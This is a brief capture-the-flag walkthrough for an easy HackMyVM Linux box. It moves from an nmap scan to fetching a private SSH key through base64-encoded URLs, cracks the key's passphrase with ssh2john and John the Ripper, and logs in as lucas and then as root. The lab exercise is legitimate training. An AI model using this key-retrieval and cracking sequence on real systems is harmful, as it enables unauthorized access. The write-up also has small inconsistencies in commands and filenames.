machine downloaded from https://hackmyvm.eu/
difficulty: Easy
OS: Linux
sudo netdiscover -i eth0 -r 192.168.5.0/24
The IP address is 192.168.5.105
sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -Pn -vvv 192.168.5.105
-oN report.txt
This machine has 2 services exposed ssh, and http on ports 22 and 80
the output:
ALL, absolutely ALL that you need is in BASE64.
Including the password that you need :)
Remember, BASE64 has the answer to all your questions.
-lucas
#!/bin/bash
# Specify the file path or name
file="common.txt"
# Check if the file exists
if [ -f "$file" ]; then
# Read the file line by line
while IFS= read -r line
do
# Print each line
echo "$line" | base64 >> base64_common.txt
done < "$file"
else
echo "File not found!"
fi
wget -qO- wget http://192.168.5.105/aWRfcnNhCg== | base64 -d
wget -qO- wget http://192.168.5.105/cm9ib3RzLnR4dAo= | base64 -d
ssh -i id_rsa lucas@192.168.5.105
Using a combination of ssh2john and jhon the reaper and the passwords found in page source, we can try to find the password.
ssh2john id_rsa > idrsa_john
john --wordlist=base64_list.txt idrsa_john
The passphrase is aWxvdmV5b3UK (iloveyou in Base64)
ssh -i id_rsa lucas@192.168.5.105
sudo chmod 600 rootid_rsa
ssh -i rootid_rsa root@192.168.5.105